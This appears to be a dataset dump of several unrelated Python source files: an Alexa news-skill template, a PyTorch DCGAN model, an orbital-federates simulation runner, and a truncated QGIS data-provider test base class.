text stringlengths 957 885k |
|---|
import os
import sys
import logging
import boto3
import inflect
import pendulum
from ask_sdk_core.skill_builder import CustomSkillBuilder
from ask_sdk_core.api_client import DefaultApiClient
from ask_sdk_core.utils import (
is_request_type, is_intent_name,
get_api_access_token, get_device_id)
from ask_sdk_core.handler_input import HandlerInput
from ask_sdk_dynamodb.adapter import DynamoDbAdapter
from ask_sdk_model.ui import (
AskForPermissionsConsentCard, SimpleCard)
from ask_sdk_model import Response
from ask_sdk_model.services import ServiceException
from ask_sdk_model.services.directive import (
Header, SendDirectiveRequest, SpeakDirective)
from botocore.exceptions import ClientError
from boto3.dynamodb.conditions import Key, Attr
ENV = os.environ['ENV']
if ENV == 'LOCAL':
dynamodb = boto3.resource(
'dynamodb',
endpoint_url='http://dynamodb:8000'
)
elif ENV == 'TEST':
dynamodb = boto3.resource(
'dynamodb',
endpoint_url='http://localhost:8000'
)
else:
from aws_xray_sdk.core import patch_all # noqa
patch_all()
dynamodb = boto3.resource('dynamodb')
PERMISSIONS = [
'alexa::profile:given_name:read',
'read::alexa:device:all:address',
]
# ------------------------------ #
SKILL_NAME = "{{cookiecutter.alexa_skill_name}}"
WELCOME = f"Welcome to {SKILL_NAME}"
GOODBYE = f"Goodbye, thank's for spending time with {SKILL_NAME} today."
FALLBACK = "I'm not sure I can do that at the moment.... sorry."
ERROR = "Sorry, I'm not sure what you are asking me. Can you please ask again!!"
ERROR_SKILL = "There was an error with the skill, please check the logs."
HELP = "You can ask me about your {{cookiecutter.alexa_skill_summary}}"
NOTIFY_MISSING_PERMISSIONS = f"{SKILL_NAME} would like to access your details. To turn share these details, please go to your Alexa app, and follow the instructions."
NOTIFY_ADDRESS_PROBLEM = "There was a problem with your address, please state your town when asking for local news"
DATA_CHECKING = "Just checking the data for you now"
WHATS_NEW = "We're just getting start and this skill is still a work in progress."
# ------------------------------ #
sb = CustomSkillBuilder(api_client=DefaultApiClient())
logger = logging.getLogger(__name__)
logger.setLevel(os.environ['LOGGING'])
# Persistence and data store
table = os.environ['DYNAMODB']
dynamodb = boto3.resource('dynamodb')
dynamodb_table = dynamodb.Table(table)
adapter = DynamoDbAdapter(
table, partition_key_name = 'uuid', dynamodb_resource = dynamodb)
p = inflect.engine()
# TODO move speech to locale files
# TODO better code re-use, less C&P
'''
Generic handlers
'''
@sb.request_handler(can_handle_func=is_request_type("LaunchRequest"))
def launch_request_handler(handler_input):
'''
Occurs when the skill is invovked without an intent
type: (HandlerInput) -> Response
'''
logger.debug('location: {}'.format(whoami()))
request_envelope = handler_input.request_envelope
response_builder = handler_input.response_builder
# TODO Check if we have a returning user
try:
dt = pendulum.now()
attr = {
'last_request_time': dt,
}
adapter.save_attributes(request_envelope, attr)
logger.debug('Persistence (save): {}'.format(attr))
except Exception as e:
logger.error('Error reported by saving persistence data : {}'.format(e))
# TODO Get the users given name if we have permissions
# TODO Move to a function
try:
user_preferences_client = handler_input.service_client_factory.get_ups_service()
profile_given_name = user_preferences_client.get_profile_given_name()
speech_text = f"Welcome to {SKILL_NAME} {profile_given_name}."
except Exception as e:
logger.error('Error reported by user preferences client : {}'.format(e))
speech_text = WELCOME
response_builder.speak(speech_text).ask(speech_text).set_card(
SimpleCard(SKILL_NAME, speech_text))
return handler_input.response_builder.response
@sb.request_handler(can_handle_func=is_intent_name("AMAZON.HelpIntent"))
def help_intent_handler(handler_input):
logger.debug('location: {}'.format(whoami()))
response_builder = handler_input.response_builder
speech_text = HELP
response_builder.speak(speech_text).ask(speech_text).set_card(
SimpleCard(SKILL_NAME, speech_text))
return response_builder.response
@sb.request_handler(can_handle_func=is_intent_name("AMAZON.FallbackIntent"))
def fallback_intent_handler(handler_input):
'''
Fallback Intent (Catch all)
type: (HandlerInput) -> Response
'''
logger.debug('location: {}'.format(whoami()))
response_builder = handler_input.response_builder
speech_text = FALLBACK
response_builder.speak(speech_text).ask(speech_text).set_card(
SimpleCard(SKILL_NAME, speech_text))
return response_builder.response
@sb.request_handler(
can_handle_func=lambda handler_input :
is_intent_name("AMAZON.CancelIntent")(handler_input) or
is_intent_name("AMAZON.StopIntent")(handler_input) or
is_intent_name("AMAZON.PauseIntent")(handler_input))
def cancel_and_stop_intent_handler(handler_input):
'''
Cancel and Stop
type: (HandlerInput) -> Response
'''
logger.debug('location: {}'.format(whoami()))
response_builder = handler_input.response_builder
speech_text = GOODBYE
response_builder.speak(speech_text)
response_builder.set_card(
SimpleCard(SKILL_NAME, speech_text))
response_builder.set_should_end_session(True)
return response_builder.response
@sb.request_handler(can_handle_func=is_request_type("SessionEndedRequest"))
def session_ended_request_handler(handler_input):
'''
Session end
type: (HandlerInput) -> Response
any cleanup logic goes here
'''
logger.debug('location: {}'.format(whoami()))
'''
Deal with skill intents
'''
@sb.request_handler(can_handle_func=is_intent_name("AboutUser"))
def aboutuser_intent_handler(handler_input):
'''
About user
type: (HandlerInput) -> Response
'''
logger.debug('location: {}'.format(whoami()))
request_envelope = handler_input.request_envelope
response_builder = handler_input.response_builder
# See if we have a location, otherwise we can use the users address
slots = request_envelope.request.intent.slots
slot_name = 'location_slot'
location_list = []
if slot_name in slots:
location_list = [slots[slot_name].value]
logger.debug('slot name: {} value {}'.format(slot_name, location_list))
if location_list[0] is None:
# Need to get the location from the address assuming we have permissions
# TODO Move to a function
if not (request_envelope.context.system.user.permissions and
request_envelope.context.system.user.permissions.consent_token):
logger.error('Insufficient permissions')
speech_text = NOTIFY_MISSING_PERMISSIONS
response_builder.speak(speech_text)
response_builder.set_card(
AskForPermissionsConsentCard(permissions = PERMISSIONS))
return response_builder.response
try:
device_id = get_device_id(handler_input)
device_addr_client = handler_input.service_client_factory.get_device_address_service()
address = device_addr_client.get_full_address(device_id)
logger.debug('Address: {}'.format(address))
if address.city is None or address.state_or_region is None:
speech_text = NOTIFY_ADDRESS_PROBLEM
else:
location_list = [address.city, address.state_or_region]
except ServiceException as e:
logger.error('Error reported by device location service: {}'.format(e))
raise e
except Exception as e:
logger.error('Error: {}'.format(e))
speech_text = ERROR_SKILL
# Example using the progressive Response API -> https://developer.amazon.com/en-US/docs/alexa/alexa-skills-kit-sdk-for-python/call-alexa-service-apis.html#directiveserviceclient
# Build the initial response back to the user whilst we look for data
# speech_text = DATA_CHECKING
# request_id_holder = request_envelope.request.request_id
# directive_header = Header(request_id = request_id_holder)
# speech = SpeakDirective(speech_text)
# directive_request = SendDirectiveRequest(
# header = directive_header,
# directive = speech
# )
# directive_service_client = handler_input.service_client_factory.get_directive_service()
# directive_service_client.enqueue(directive_request)
try:
# TODO fix the capitalisation on non-towns (and probably the user data)
# TODO need to ensure we scan the data for all items in location_list
r = dynamodb_table.scan(
FilterExpression = Attr('location').contains(location_list[0])
)
logger.debug('r: {}'.format(r))
except Exception as e:
logger.error('Error (dynamodb_table): {}'.format(e))
speech_text = "It's all gone pete tong"
news_locations = ' and '.join(location_list)
if r['Count'] > 0:
news_item_count = r['Count']
# news_items = p.plural('new', news_item_count)
speech_text = f"I've found {news_item_count} news {p.plural('item', news_item_count)} for you in {news_locations}....."
else:
speech_text = f"I couldn't find any news items in {news_locations} at this time, sorry."
response_builder.speak(speech_text).set_card(
SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(
True)
return response_builder.response
@sb.request_handler(can_handle_func=is_intent_name("GetColour"))
def get_colour_intent_handler(handler_input):
'''
Get the users preferred colour
'''
logger.debug('location: {}'.format(whoami()))
response_builder = handler_input.response_builder
speech_text = "I don't know what colour you like, sorry."
response_builder.speak(speech_text).ask(speech_text).set_card(
SimpleCard(SKILL_NAME, speech_text))
return response_builder.response
@sb.request_handler(can_handle_func=is_intent_name("SetColour"))
def set_colour_intent_handler(handler_input):
'''
Get the users preferred colour
'''
logger.debug('location: {}'.format(whoami()))
response_builder = handler_input.response_builder
speech_text = "I don't know what colour you like, sorry."
response_builder.speak(speech_text).ask(speech_text).set_card(
SimpleCard(SKILL_NAME, speech_text))
return response_builder.response
'''
Helpers
'''
@sb.global_request_interceptor()
def request_logger(handler_input):
logger.debug('Alexa Request: {}'.format(
handler_input.request_envelope.request))
logger.debug('Persistence (get): {}'.format(
adapter.get_attributes(handler_input.request_envelope)))
'''
Exceptions
'''
@sb.exception_handler(can_handle_func=lambda i, e: True)
def all_exception_handler(handler_input, exception):
'''
type: (HandlerInput, Exception) -> Response
Log the exception in CloudWatch Logs
'''
logger.debug('location: {}'.format(whoami()))
logger.debug('exception: {}'.format(exception))
logger.debug('request_envelope: {}'.format(handler_input.request_envelope))
speech = ERROR
handler_input.response_builder.speak(speech).ask(speech)
return handler_input.response_builder.response
def whoami():
return sys._getframe(1).f_code.co_name
skill = sb.create()
lambda_handler = sb.lambda_handler()
|
import torch.nn as nn
import config
class NetG(nn.Module):
def __init__(self):
super(NetG, self).__init__()
self.layer_1 = nn.Sequential(
nn.ConvTranspose2d(config.latent_dim, 512, kernel_size=4, stride = 1, bias=False),
nn.BatchNorm2d(512),
# nn.ReLU(inplace=True)
nn.LeakyReLU(0.2, inplace=True)
)
self.layer_2 = nn.Sequential(
nn.ConvTranspose2d(512, 256, 5, 2, bias=False),
nn.BatchNorm2d(256),
nn.Dropout(p=0.5),
# nn.ReLU(inplace=True)
nn.LeakyReLU(0.2, inplace=True)
)
self.layer_3 = nn.Sequential(
nn.ConvTranspose2d(256, 256, 5, 2, bias=False),
nn.BatchNorm2d(256),
nn.Dropout(p=0.5),
# nn.ReLU(inplace=True)
nn.LeakyReLU(0.2, inplace=True)
)
self.layer_4 = nn.Sequential(
nn.ConvTranspose2d(256, 128, 5, 2, bias=False),
nn.BatchNorm2d(128),
nn.Dropout(p=0.5),
# nn.ReLU(inplace=True)
nn.LeakyReLU(0.2, inplace=True)
)
self.layer_5 = nn.Sequential(
nn.ConvTranspose2d(128, 3, 5, 2, bias=False),
nn.Tanh()
)
for m in self.modules():
if isinstance(m, nn.ConvTranspose2d):
nn.init.normal_(m.weight, mean=0, std=0.02)
def forward(self, x):
out = self.layer_1(x)
out = self.layer_2(out)
out = self.layer_3(out)
out = self.layer_4(out)
out = self.layer_5(out)
return out
class NetD(nn.Module):
def __init__(self):
super(NetD, self).__init__()
self.layer_1 = nn.Sequential( # 96*96*3
nn.Conv2d(3, 128, kernel_size=5, stride=3, padding=1, bias=False),
nn.LeakyReLU(0.2, inplace=True)
)
self.layer_2 = nn.Sequential( # 32*32*128
nn.Conv2d(128, 256, 5, 2, bias=False),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.2, inplace=True)
)
self.layer_3 = nn.Sequential( # 14*14*256
nn.Conv2d(256, 256, 3, 2, bias=False),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.2, inplace=True)
)
self.layer_4 = nn.Sequential( # 6*6*512
nn.Conv2d(256, 512, 3, 2, 1, bias=False),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.2, inplace=True)
)
self.layer_5 = nn.Sequential( # 3*3*1024
nn.Conv2d(512, 1, 4, 1, bias=False),
# nn.Sigmoid()
)
for m in self.modules():
if isinstance(m, nn.ConvTranspose2d):
nn.init.normal_(m.weight, mean=0, std=0.02)
def forward(self, x):
out = self.layer_1(x)
out = self.layer_2(out)
out = self.layer_3(out)
out = self.layer_4(out)
out = self.layer_5(out)
return out
|
<filename>bin/ofs.py
"""
Copyright 2015 <NAME>, Massachusetts Institute of Technology
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
import logging
import sys,os
# add ofspy to system path
sys.path.append(os.path.abspath('..'))
from ofspy.ofs import OFS
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="This program runs an Orbital Federates simulation.")
parser.add_argument('elements', type=str, nargs='+',
help='the list of initial elements, e.g. 1.GroundSta@SUR1,pSGL 1.SmallSat@LEO1,pSGL,SAR')
parser.add_argument('-d', '--numTurns', type=int, default=24,
help='simulation duration (number of turns)')
parser.add_argument('-p', '--numPlayers', type=int, default=None,
help='number of players')
parser.add_argument('-i', '--initialCash', type=int, default=None,
help='initial cash')
parser.add_argument('-s', '--seed', type=int, default=0,
help='random number seed')
parser.add_argument('-o', '--ops', type=str, default='d6',
help='federate operations model specification')
parser.add_argument('-f', '--fops', type=str, default='',
help='federation operations model specification')
parser.add_argument('-l', '--logging', type=str, default='error',
choices=['debug','info','warning','error'],
help='logging level')
parser.add_argument('-g', '--gui', action='store_true',
help='launch with graphical user interface')
args = parser.parse_args()
if args.logging == 'debug':
level = logging.DEBUG
elif args.logging == 'info':
level = logging.INFO
elif args.logging == 'warning':
level = logging.WARNING
elif args.logging == 'error':
level = logging.ERROR
logging.basicConfig(level=level)
print args
# count the number of players if not specified
if args.numPlayers is None:
numPlayers = 0
for element in args.elements:
specs = element.split(',')
if len(specs) > 0 and len(specs[0].split('@')) == 2:
# parse player ownership
if len(specs[0].split('@')[0].split('.')) == 2:
pId = int(specs[0].split('@')[0].split('.')[0])-1
else:
pId = 0
numPlayers = max(numPlayers, pId+1)
else:
numPlayers = args.numPlayers
# set up the simulation
ofs = OFS(elements=args.elements, numTurns=args.numTurns,
numPlayers=numPlayers, initialCash=args.initialCash,
seed=args.seed, ops=args.ops, fops=args.fops)
if args.gui:
# launch gui and start simulation
from Tkinter import Tk
from ofspy_gui.frame import FrameOFS
root = Tk()
frame = FrameOFS(root, ofs)
ofs.sim.init()
root.mainloop()
else:
# execute simulation and output results
results = ofs.execute()
for result in results:
print '{0}:{1}'.format(result[0], result[1]) |
# -*- coding: utf-8 -*-
"""QGIS Unit test utils for provider tests.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
from builtins import str
from builtins import object
__author__ = '<NAME>'
__date__ = '2015-04-27'
__copyright__ = 'Copyright 2015, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '1<PASSWORD>ce<PASSWORD>'
from qgis.core import (
QgsApplication,
QgsRectangle,
QgsFeatureRequest,
QgsFeature,
QgsGeometry,
QgsAbstractFeatureIterator,
QgsExpressionContextScope,
QgsExpressionContext,
QgsExpression,
QgsVectorDataProvider,
QgsVectorLayerFeatureSource,
QgsFeatureSink,
QgsTestUtils,
QgsFeatureSource,
NULL
)
from qgis.PyQt.QtTest import QSignalSpy
from utilities import compareWkt
from featuresourcetestbase import FeatureSourceTestCase
class ProviderTestCase(FeatureSourceTestCase):
'''
This is a collection of tests for vector data providers and kept generic.
To make use of it, subclass it and set self.source to a provider you want to test.
Make sure that your provider uses the default dataset by converting one of the provided datasets from the folder
tests/testdata/provider to a dataset your provider is able to handle.
To test expression compilation, add the methods `enableCompiler()` and `disableCompiler()` to your subclass.
If these methods are present, the tests will ensure that the result of server side and client side expression
evaluation are equal.
'''
def uncompiledFilters(self):
""" Individual derived provider tests should override this to return a list of expressions which
cannot be compiled """
return set()
def enableCompiler(self):
"""By default there is no expression compiling available, needs to be overridden in subclass"""
print('Provider does not support compiling')
return False
def partiallyCompiledFilters(self):
""" Individual derived provider tests should override this to return a list of expressions which
should be partially compiled """
return set()
def assert_query(self, source, expression, expected):
FeatureSourceTestCase.assert_query(self, source, expression, expected)
if self.compiled:
# Check compilation status
it = source.getFeatures(QgsFeatureRequest().setFilterExpression(expression))
if expression in self.uncompiledFilters():
self.assertEqual(it.compileStatus(), QgsAbstractFeatureIterator.NoCompilation)
elif expression in self.partiallyCompiledFilters():
self.assertEqual(it.compileStatus(), QgsAbstractFeatureIterator.PartiallyCompiled)
else:
self.assertEqual(it.compileStatus(), QgsAbstractFeatureIterator.Compiled)
def runGetFeatureTests(self, source):
FeatureSourceTestCase.runGetFeatureTests(self, source)
# combination of an uncompilable expression and limit
feature = next(self.vl.getFeatures('pk=4'))
context = QgsExpressionContext()
scope = QgsExpressionContextScope()
scope.setVariable('parent', feature)
context.appendScope(scope)
request = QgsFeatureRequest()
request.setExpressionContext(context)
request.setFilterExpression('"pk" = attribute(@parent, \'pk\')')
request.setLimit(1)
values = [f['pk'] for f in self.vl.getFeatures(request)]
self.assertEqual(values, [4])
def runPolyGetFeatureTests(self, provider):
assert len([f for f in provider.getFeatures()]) == 4
# geometry
self.assert_query(provider, 'x($geometry) < -70', [1])
self.assert_query(provider, 'y($geometry) > 79', [1, 2])
self.assert_query(provider, 'xmin($geometry) < -70', [1, 3])
self.assert_query(provider, 'ymin($geometry) < 76', [3])
self.assert_query(provider, 'xmax($geometry) > -68', [2, 3])
self.assert_query(provider, 'ymax($geometry) > 80', [1, 2])
self.assert_query(provider, 'area($geometry) > 10', [1])
self.assert_query(provider, 'perimeter($geometry) < 12', [2, 3])
self.assert_query(provider,
'relate($geometry,geom_from_wkt( \'Polygon ((-68.2 82.1, -66.95 82.1, -66.95 79.05, -68.2 79.05, -68.2 82.1))\')) = \'FF2FF1212\'',
[1, 3])
self.assert_query(provider,
'relate($geometry,geom_from_wkt( \'Polygon ((-68.2 82.1, -66.95 82.1, -66.95 79.05, -68.2 79.05, -68.2 82.1))\'), \'****F****\')',
[1, 3])
self.assert_query(provider,
'crosses($geometry,geom_from_wkt( \'Linestring (-68.2 82.1, -66.95 82.1, -66.95 79.05)\'))',
[2])
self.assert_query(provider,
'overlaps($geometry,geom_from_wkt( \'Polygon ((-68.2 82.1, -66.95 82.1, -66.95 79.05, -68.2 79.05, -68.2 82.1))\'))',
[2])
self.assert_query(provider,
'within($geometry,geom_from_wkt( \'Polygon ((-75.1 76.1, -75.1 81.6, -68.8 81.6, -68.8 76.1, -75.1 76.1))\'))',
[1])
self.assert_query(provider,
'overlaps(translate($geometry,-1,-1),geom_from_wkt( \'Polygon ((-75.1 76.1, -75.1 81.6, -68.8 81.6, -68.8 76.1, -75.1 76.1))\'))',
[1])
self.assert_query(provider,
'overlaps(buffer($geometry,1),geom_from_wkt( \'Polygon ((-75.1 76.1, -75.1 81.6, -68.8 81.6, -68.8 76.1, -75.1 76.1))\'))',
[1, 3])
self.assert_query(provider,
'intersects(centroid($geometry),geom_from_wkt( \'Polygon ((-74.4 78.2, -74.4 79.1, -66.8 79.1, -66.8 78.2, -74.4 78.2))\'))',
[2])
self.assert_query(provider,
'intersects(point_on_surface($geometry),geom_from_wkt( \'Polygon ((-74.4 78.2, -74.4 79.1, -66.8 79.1, -66.8 78.2, -74.4 78.2))\'))',
[1, 2])
self.assert_query(provider, 'distance($geometry,geom_from_wkt( \'Point (-70 70)\')) > 7', [1, 2])
def testGetFeaturesUncompiled(self):
self.compiled = False
try:
self.disableCompiler()
except AttributeError:
pass
self.runGetFeatureTests(self.source)
if hasattr(self, 'poly_provider'):
self.runPolyGetFeatureTests(self.poly_provider)
def testGetFeaturesExp(self):
if self.enableCompiler():
self.compiled = True
self.runGetFeatureTests(self.source)
if hasattr(self, 'poly_provider'):
self.runPolyGetFeatureTests(self.poly_provider)
def testSubsetString(self):
if not self.source.supportsSubsetString():
print('Provider does not support subset strings')
return
changed_spy = QSignalSpy(self.source.dataChanged)
subset = self.getSubsetString()
self.source.setSubsetString(subset)
self.assertEqual(self.source.subsetString(), subset)
self.assertEqual(len(changed_spy), 1)
# No signal should be emitted if the subset string is not modified
self.source.setSubsetString(subset)
self.assertEqual(len(changed_spy), 1)
result = set([f['pk'] for f in self.source.getFeatures()])
all_valid = (all(f.isValid() for f in self.source.getFeatures()))
self.source.setSubsetString(None)
expected = set([2, 3, 4])
assert set(expected) == result, 'Expected {} and got {} when testing subset string {}'.format(set(expected),
result, subset)
self.assertTrue(all_valid)
# Subset string AND filter rect
self.source.setSubsetString(subset)
extent = QgsRectangle(-70, 70, -60, 75)
request = QgsFeatureRequest().setFilterRect(extent)
result = set([f['pk'] for f in self.source.getFeatures(request)])
all_valid = (all(f.isValid() for f in self.source.getFeatures(request)))
self.source.setSubsetString(None)
expected = set([2])
assert set(expected) == result, 'Expected {} and got {} when testing subset string {}'.format(set(expected),
result, subset)
self.assertTrue(all_valid)
# Subset string AND filter rect, version 2
self.source.setSubsetString(subset)
extent = QgsRectangle(-71, 65, -60, 80)
result = set([f['pk'] for f in self.source.getFeatures(QgsFeatureRequest().setFilterRect(extent))])
self.source.setSubsetString(None)
expected = set([2, 4])
assert set(expected) == result, 'Expected {} and got {} when testing subset string {}'.format(set(expected),
result, subset)
# Subset string AND expression
self.source.setSubsetString(subset)
request = QgsFeatureRequest().setFilterExpression('length("name")=5')
result = set([f['pk'] for f in self.source.getFeatures(request)])
all_valid = (all(f.isValid() for f in self.source.getFeatures(request)))
self.source.setSubsetString(None)
expected = set([2, 4])
assert set(expected) == result, 'Expected {} and got {} when testing subset string {}'.format(set(expected),
result, subset)
self.assertTrue(all_valid)
def getSubsetString(self):
"""Individual providers may need to override this depending on their subset string formats"""
return '"cnt" > 100 and "cnt" < 410'
def getSubsetString2(self):
"""Individual providers may need to override this depending on their subset string formats"""
return '"cnt" > 100 and "cnt" < 400'
def getSubsetString3(self):
"""Individual providers may need to override this depending on their subset string formats"""
return '"name"=\'Apple\''
def getSubsetStringNoMatching(self):
"""Individual providers may need to override this depending on their subset string formats"""
return '"name"=\'AppleBearOrangePear\''
def testGetFeaturesThreadSafety(self):
# no request
self.assertTrue(QgsTestUtils.testProviderIteratorThreadSafety(self.source))
# filter rect request
extent = QgsRectangle(-73, 70, -63, 80)
request = QgsFeatureRequest().setFilterRect(extent)
self.assertTrue(QgsTestUtils.testProviderIteratorThreadSafety(self.source, request))
def testOrderBy(self):
try:
self.disableCompiler()
except AttributeError:
pass
self.runOrderByTests()
def testOrderByCompiled(self):
if self.enableCompiler():
self.runOrderByTests()
def runOrderByTests(self):
FeatureSourceTestCase.runOrderByTests(self)
# Combination with subset of attributes
request = QgsFeatureRequest().addOrderBy('num_char', False).setSubsetOfAttributes(['pk'], self.vl.fields())
values = [f['pk'] for f in self.vl.getFeatures(request)]
self.assertEqual(values, [5, 4, 3, 2, 1])
def testOpenIteratorAfterLayerRemoval(self):
"""
Test that removing layer after opening an iterator does not crash. All required
information should be captured in the iterator's source and there MUST be no
links between the iterators and the layer's data provider
"""
if not getattr(self, 'getEditableLayer', None):
return
l = self.getEditableLayer()
self.assertTrue(l.isValid())
# store the source
source = QgsVectorLayerFeatureSource(l)
# delete the layer
del l
# get the features
pks = []
for f in source.getFeatures():
pks.append(f['pk'])
self.assertEqual(set(pks), {1, 2, 3, 4, 5})
def testGetFeaturesPolyFilterRectTests(self):
""" Test fetching features from a polygon layer with filter rect"""
try:
if not self.poly_provider:
return
except:
return
extent = QgsRectangle(-73, 70, -63, 80)
request = QgsFeatureRequest().setFilterRect(extent)
features = [f['pk'] for f in self.poly_provider.getFeatures(request)]
all_valid = (all(f.isValid() for f in self.source.getFeatures(request)))
# Some providers may return the exact intersection matches (2, 3) even without the ExactIntersect flag, so we accept that too
assert set(features) == set([2, 3]) or set(features) == set([1, 2, 3]), 'Got {} instead'.format(features)
self.assertTrue(all_valid)
# Test with exact intersection
request = QgsFeatureRequest().setFilterRect(extent).setFlags(QgsFeatureRequest.ExactIntersect)
features = [f['pk'] for f in self.poly_provider.getFeatures(request)]
all_valid = (all(f.isValid() for f in self.source.getFeatures(request)))
assert set(features) == set([2, 3]), 'Got {} instead'.format(features)
self.assertTrue(all_valid)
# test with an empty rectangle
extent = QgsRectangle()
features = [f['pk'] for f in self.source.getFeatures(QgsFeatureRequest().setFilterRect(extent))]
assert set(features) == set([1, 2, 3, 4, 5]), 'Got {} instead'.format(features)
def testMinValue(self):
self.assertFalse(self.source.minimumValue(-1))
self.assertFalse(self.source.minimumValue(1000))
self.assertEqual(self.source.minimumValue(self.source.fields().lookupField('cnt')), -200)
self.assertEqual(self.source.minimumValue(self.source.fields().lookupField('name')), 'Apple')
if self.source.supportsSubsetString():
subset = self.getSubsetString()
self.source.setSubsetString(subset)
min_value = self.source.minimumValue(self.source.fields().lookupField('cnt'))
self.source.setSubsetString(None)
self.assertEqual(min_value, 200)
def testMaxValue(self):
self.assertFalse(self.source.maximumValue(-1))
self.assertFalse(self.source.maximumValue(1000))
self.assertEqual(self.source.maximumValue(self.source.fields().lookupField('cnt')), 400)
self.assertEqual(self.source.maximumValue(self.source.fields().lookupField('name')), 'Pear')
if self.source.supportsSubsetString():
subset = self.getSubsetString2()
self.source.setSubsetString(subset)
max_value = self.source.maximumValue(self.source.fields().lookupField('cnt'))
self.source.setSubsetString(None)
self.assertEqual(max_value, 300)
def testExtent(self):
reference = QgsGeometry.fromRect(
QgsRectangle(-71.123, 66.33, -65.32, 78.3))
provider_extent = self.source.extent()
self.assertAlmostEqual(provider_extent.xMinimum(), -71.123, 3)
self.assertAlmostEqual(provider_extent.xMaximum(), -65.32, 3)
self.assertAlmostEqual(provider_extent.yMinimum(), 66.33, 3)
self.assertAlmostEqual(provider_extent.yMaximum(), 78.3, 3)
if self.source.supportsSubsetString():
# with only one point
subset = self.getSubsetString3()
self.source.setSubsetString(subset)
count = self.source.featureCount()
provider_extent = self.source.extent()
self.source.setSubsetString(None)
self.assertEqual(count, 1)
self.assertAlmostEqual(provider_extent.xMinimum(), -68.2, 3)
self.assertAlmostEqual(provider_extent.xMaximum(), -68.2, 3)
self.assertAlmostEqual(provider_extent.yMinimum(), 70.8, 3)
self.assertAlmostEqual(provider_extent.yMaximum(), 70.8, 3)
# with no points
subset = self.getSubsetStringNoMatching()
self.source.setSubsetString(subset)
count = self.source.featureCount()
provider_extent = self.source.extent()
self.source.setSubsetString(None)
self.assertEqual(count, 0)
self.assertTrue(provider_extent.isNull())
self.assertEqual(self.source.featureCount(), 5)
def testUnique(self):
self.assertEqual(self.source.uniqueValues(-1), set())
self.assertEqual(self.source.uniqueValues(1000), set())
self.assertEqual(set(self.source.uniqueValues(self.source.fields().lookupField('cnt'))),
set([-200, 100, 200, 300, 400]))
assert set(['Apple', 'Honey', 'Orange', 'Pear', NULL]) == set(
self.source.uniqueValues(self.source.fields().lookupField('name'))), 'Got {}'.format(
set(self.source.uniqueValues(self.source.fields().lookupField('name'))))
if self.source.supportsSubsetString():
subset = self.getSubsetString2()
self.source.setSubsetString(subset)
values = self.source.uniqueValues(self.source.fields().lookupField('cnt'))
self.source.setSubsetString(None)
self.assertEqual(set(values), set([200, 300]))
def testUniqueStringsMatching(self):
self.assertEqual(self.source.uniqueStringsMatching(-1, 'a'), [])
self.assertEqual(self.source.uniqueStringsMatching(100001, 'a'), [])
field_index = self.source.fields().lookupField('name')
self.assertEqual(set(self.source.uniqueStringsMatching(field_index, 'a')), set(['Pear', 'Orange', 'Apple']))
# test case insensitive
self.assertEqual(set(self.source.uniqueStringsMatching(field_index, 'A')), set(['Pear', 'Orange', 'Apple']))
# test string ending in substring
self.assertEqual(set(self.source.uniqueStringsMatching(field_index, 'ney')), set(['Honey']))
# test limit
result = set(self.source.uniqueStringsMatching(field_index, 'a', 2))
self.assertEqual(len(result), 2)
self.assertTrue(result.issubset(set(['Pear', 'Orange', 'Apple'])))
assert set([u'Apple', u'Honey', u'Orange', u'Pear', NULL]) == set(
self.source.uniqueValues(field_index)), 'Got {}'.format(set(self.source.uniqueValues(field_index)))
if self.source.supportsSubsetString():
subset = self.getSubsetString2()
self.source.setSubsetString(subset)
values = self.source.uniqueStringsMatching(2, 'a')
self.source.setSubsetString(None)
self.assertEqual(set(values), set(['Pear', 'Apple']))
def testFeatureCount(self):
self.assertEqual(self.source.featureCount(), 5)
if self.source.supportsSubsetString():
# Add a subset string and test feature count
subset = self.getSubsetString()
self.source.setSubsetString(subset)
count = self.source.featureCount()
self.source.setSubsetString(None)
self.assertEqual(count, 3)
self.assertEqual(self.source.featureCount(), 5)
# one matching records
subset = self.getSubsetString3()
self.source.setSubsetString(subset)
count = self.source.featureCount()
self.source.setSubsetString(None)
self.assertEqual(count, 1)
self.assertEqual(self.source.featureCount(), 5)
# no matching records
subset = self.getSubsetStringNoMatching()
self.source.setSubsetString(subset)
count = self.source.featureCount()
self.source.setSubsetString(None)
self.assertEqual(count, 0)
self.assertEqual(self.source.featureCount(), 5)
def testEmpty(self):
self.assertFalse(self.source.empty())
self.assertEqual(self.source.hasFeatures(), QgsFeatureSource.FeaturesAvailable)
if self.source.supportsSubsetString():
try:
backup = self.source.subsetString()
# Add a subset string and test feature count
subset = self.getSubsetString()
self.source.setSubsetString(subset)
self.assertFalse(self.source.empty())
self.assertEqual(self.source.hasFeatures(), QgsFeatureSource.FeaturesAvailable)
subsetNoMatching = self.getSubsetStringNoMatching()
self.source.setSubsetString(subsetNoMatching)
self.assertTrue(self.source.empty())
self.assertEqual(self.source.hasFeatures(), QgsFeatureSource.NoFeaturesAvailable)
finally:
self.source.setSubsetString(None)
self.assertFalse(self.source.empty())
# If the provider supports tests on editable layers
if getattr(self, 'getEditableLayer', None):
l = self.getEditableLayer()
self.assertTrue(l.isValid())
self.assertEqual(l.hasFeatures(), QgsFeatureSource.FeaturesAvailable)
# Test that deleting some features in the edit buffer does not
# return empty, we accept FeaturesAvailable as well as
# MaybeAvailable
l.startEditing()
l.deleteFeature(next(l.getFeatures()).id())
self.assertNotEqual(l.hasFeatures(), QgsFeatureSource.NoFeaturesAvailable)
l.rollBack()
# Call truncate(), we need an empty set now
l.dataProvider().truncate()
self.assertTrue(l.dataProvider().empty())
self.assertEqual(l.dataProvider().hasFeatures(), QgsFeatureSource.NoFeaturesAvailable)
def testGetFeaturesNoGeometry(self):
""" Test that no geometry is present when fetching features without geometry"""
for f in self.source.getFeatures(QgsFeatureRequest().setFlags(QgsFeatureRequest.NoGeometry)):
